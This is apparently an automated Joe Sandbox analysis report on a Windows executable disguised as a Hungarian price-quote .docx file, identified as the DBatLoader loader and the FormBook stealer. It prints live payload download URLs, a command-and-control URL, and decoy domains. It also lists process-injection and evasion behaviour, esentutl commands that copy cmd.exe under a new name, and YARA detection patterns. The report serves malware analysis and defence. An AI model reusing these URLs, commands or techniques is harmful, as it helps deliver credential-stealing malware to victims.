Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe

Overview

General Information

Sample name:#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
renamed because original name is a hash value
Original sample name:rajnlat krs MOL093478524docx.exe
Analysis ID:1553904
MD5:ffd79398ecb6b74ae4e751157796870b
SHA1:cedc86d9d511aa0b4ee0102cfcda83c7eb296afc
SHA256:5166f1f0d6693793e12932e324f36450126c907365ba4a9d45388831121bfcb1
Tags:exeHUNuser-smica83
Infos:

Detection

DBatLoader, FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates a thread in another existing process (thread injection)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to resolve many domain names, but no domain seems valid
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Child Processes Of SndVol.exe
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe (PID: 6928 cmdline: "C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe" MD5: FFD79398ECB6B74AE4E751157796870B)
    • cmd.exe (PID: 7164 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\rqbnwzgR.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 3756 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 8 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
    • SndVol.exe (PID: 2664 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • netsh.exe (PID: 4948 cmdline: "C:\Windows\SysWOW64\netsh.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
          • cmd.exe (PID: 7156 cmdline: /c del "C:\Windows\SysWOW64\SndVol.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["http://voievodulgelu.ro/244_Rgzwnbqrkpn", "http://mbsngradnja.com/244_Rgzwnbqrkpn"]}

Threatname: FormBook

{"C2 list": ["www.atingdilse.site/d05n/"], "decoy": ["cdrama.site", "ise142.xyz", "ynthia-mcc-lin-tick.link", "askabirokulmumkun.online", "tpdayakslot888.top", "adikoyescortatings.xyz", "ybzert.online", "ujdd.shop", "90yhj301.top", "2xiezhen.net", "uickerandeasier.store", "ode.xyz", "9838.xyz", "gsbet.net", "ustavoglins.store", "evelupcasino.club", "826mza.top", "eanliving.site", "87crxy301.top", "amzlo.shop", "rmt.xyz", "cductcleaning102.fun", "hechefsexperience.info", "joops.music", "ultangaziescortbayanlari.online", "arot-chat.online", "dipisci-harum.site", "kd00.top", "caffolding-17822.bond", "wdes83904.vip", "nilink.education", "egos.design", "nline-advertising-95315.bond", "ental-implants-50062.bond", "apaescortatings.xyz", "r-outsourcing-69869.bond", "card.boats", "affodilconsignment.shop", "rafting-minecraft.link", "ittycozy.shop", "itchen-appliances-55012.bond", "rnuah.xyz", "h8gq8vzm9j.buzz", "espasaigon.online", "ursing-caregiver-jobs-za-3.bond", "yzsports200.xyz", "enies.top", "zziof2.xyz", "estspacefox.shop", "buod.info", "ichetgouttiere.link", "egakids.shop", "xc31.top", "ebsiteclients.online", "trl-migrate.online", "uantumgrovedesignstudio.online", "ajagacor777bar.art", "ynapticshiftai.tech", "irdewagacor89.lat", "amlouis.music", "aim79.online", "upta.bio", "druei.info", "utobahncollision.shop"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18819:$sqlite3step: 68 34 1C 7B E1
      • 0x1892c:$sqlite3step: 68 34 1C 7B E1
      • 0x18848:$sqlite3text: 68 38 2A 90 C5
      • 0x1896d:$sqlite3text: 68 38 2A 90 C5
      • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 44 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.SndVol.exe.47c0000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.SndVol.exe.47c0000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          5.2.SndVol.exe.47c0000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          5.2.SndVol.exe.47c0000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          5.2.SndVol.exe.47c0000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18819:$sqlite3step: 68 34 1C 7B E1
          • 0x1892c:$sqlite3step: 68 34 1C 7B E1
          • 0x18848:$sqlite3text: 68 38 2A 90 C5
          • 0x1896d:$sqlite3text: 68 38 2A 90 C5
          • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 16 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
          Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, ProcessId: 6928, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
          Sigma detected: Uncommon Child Processes Of SndVol.exe
          Source: Process startedAuthor: X__Junior (Nextron Systems): Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: C:\Windows\System32\SndVol.exe, ParentImage: C:\Windows\SysWOW64\SndVol.exe, ParentProcessId: 2664, ParentProcessName: SndVol.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 2580, ProcessName: explorer.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-11T19:17:05.224463+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449734TCP
          2024-11-11T19:17:43.068110+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449741TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeAvira: detected
          Antivirus detection for URL or domain
          Source: http://voievodulgelu.ro/244_RgzwnbqrkpnAvira URL Cloud: Label: malware
          Source: http://mbsngradnja.com:80/244_RgzwnbqrkpnAvira URL Cloud: Label: malware
          Source: http://mbsngradnja.com/244_RgzwnbqrkpnAvira URL Cloud: Label: malware
          Found malware configuration
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["http://voievodulgelu.ro/244_Rgzwnbqrkpn", "http://mbsngradnja.com/244_Rgzwnbqrkpn"]}
          Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.atingdilse.site/d05n/"], "decoy": ["cdrama.site", "ise142.xyz", "ynthia-mcc-lin-tick.link", "askabirokulmumkun.online", "tpdayakslot888.top", "adikoyescortatings.xyz", "ybzert.online", "ujdd.shop", "90yhj301.top", "2xiezhen.net", "uickerandeasier.store", "ode.xyz", "9838.xyz", "gsbet.net", "ustavoglins.store", "evelupcasino.club", "826mza.top", "eanliving.site", "87crxy301.top", "amzlo.shop", "rmt.xyz", "cductcleaning102.fun", "hechefsexperience.info", "joops.music", "ultangaziescortbayanlari.online", "arot-chat.online", "dipisci-harum.site", "kd00.top", "caffolding-17822.bond", "wdes83904.vip", "nilink.education", "egos.design", "nline-advertising-95315.bond", "ental-implants-50062.bond", "apaescortatings.xyz", "r-outsourcing-69869.bond", "card.boats", "affodilconsignment.shop", "rafting-minecraft.link", "ittycozy.shop", "itchen-appliances-55012.bond", "rnuah.xyz", "h8gq8vzm9j.buzz", "espasaigon.online", "ursing-caregiver-jobs-za-3.bond", "yzsports200.xyz", "enies.top", "zziof2.xyz", "estspacefox.shop", "buod.info", "ichetgouttiere.link", "egakids.shop", "xc31.top", "ebsiteclients.online", "trl-migrate.online", "uantumgrovedesignstudio.online", "ajagacor777bar.art", "ynapticshiftai.tech", "irdewagacor89.lat", "amlouis.music", "aim79.online", "upta.bio", "druei.info", "utobahncollision.shop"]}
          Multi AV Scanner detection for submitted file
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeReversingLabs: Detection: 47%
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.SndVol.exe.47c0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.SndVol.exe.47c0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeJoe Sandbox ML: detected
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: SndVol.pdbGCTL source: explorer.exe, 00000006.00000002.4182572675.0000000010F3F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000007.00000002.4169965326.0000000001106000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4171199207.0000000003D8F000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: netsh.pdb source: SndVol.exe, 00000005.00000003.1857901713.000000000279F000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000003.1857901713.000000000278F000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1887842160.0000000036530000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, netsh.exe, 00000007.00000002.4170356503.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: easinvoker.pdb source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1699414288.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1802025205.0000000020680000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1700194533.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000003.00000003.1766177513.0000000005350000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.3.dr
          Source: Binary string: wntdll.pdbUGP source: SndVol.exe, 00000005.00000003.1782780302.00000000363B2000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000005.00000003.1780846168.0000000036205000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000007.00000003.1861588490.000000000368D000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000003.1857987184.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4170553406.00000000039DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4170553406.0000000003840000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: SndVol.exe, 00000005.00000003.1857901713.000000000279F000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000003.1857901713.000000000278F000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1887842160.0000000036530000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, 00000007.00000002.4170356503.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000004.00000003.1771269701.0000000005700000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.4.dr
          Source: Binary string: wntdll.pdb source: SndVol.exe, SndVol.exe, 00000005.00000003.1782780302.00000000363B2000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000005.00000003.1780846168.0000000036205000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000007.00000003.1861588490.000000000368D000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000003.1857987184.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4170553406.00000000039DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4170553406.0000000003840000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdbH source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdbGCTL source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1769510665.0000000021611000.00000004.00000020.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1769510665.00000000215E2000.00000004.00000020.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782270171.0000000002765000.00000004.00000020.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1699414288.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1802025205.0000000020680000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1700194533.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1699986277.0000000002764000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmd.pdb source: esentutl.exe, 00000003.00000003.1766177513.0000000005350000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.3.dr
          Source: Binary string: ping.pdb source: esentutl.exe, 00000004.00000003.1771269701.0000000005700000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.4.dr
          Source: Binary string: SndVol.pdb source: explorer.exe, 00000006.00000002.4182572675.0000000010F3F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000007.00000002.4169965326.0000000001106000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4171199207.0000000003D8F000.00000004.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029A5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_029A5908
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4x nop then pop edi5_2_047CE470
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop edi7_2_00B8E470

          Networking

          barindex
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: http://voievodulgelu.ro/244_Rgzwnbqrkpn
          Source: Malware configuration extractorURLs: http://mbsngradnja.com/244_Rgzwnbqrkpn
          Source: Malware configuration extractorURLs: www.atingdilse.site/d05n/
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.apaescortatings.xyz
          Source: DNS query: www.9838.xyz
          Tries to resolve many domain names, but no domain seems valid
          Source: unknownDNS traffic detected: query: www.trl-migrate.online replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.ursing-caregiver-jobs-za-3.bond replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.joops.music replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.9838.xyz replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.ynthia-mcc-lin-tick.link replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.atingdilse.site replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.egos.design replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.apaescortatings.xyz replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.upta.bio replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.r-outsourcing-69869.bond replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.xc31.top replaycode: Server failure (2)
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029BE4B8 InternetCheckConnectionA,0_2_029BE4B8
          Source: Joe Sandbox ViewASN Name: ORIONTELEKOM-ASRS ORIONTELEKOM-ASRS
          Source: Joe Sandbox ViewASN Name: DIALTELECOMRO DIALTELECOMRO
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49741
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49734
          Source: global trafficHTTP traffic detected: GET /244_Rgzwnbqrkpn HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: voievodulgelu.ro
          Source: global trafficHTTP traffic detected: GET /244_Rgzwnbqrkpn HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: mbsngradnja.com
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /244_Rgzwnbqrkpn HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: voievodulgelu.ro
          Source: global trafficHTTP traffic detected: GET /244_Rgzwnbqrkpn HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: mbsngradnja.com
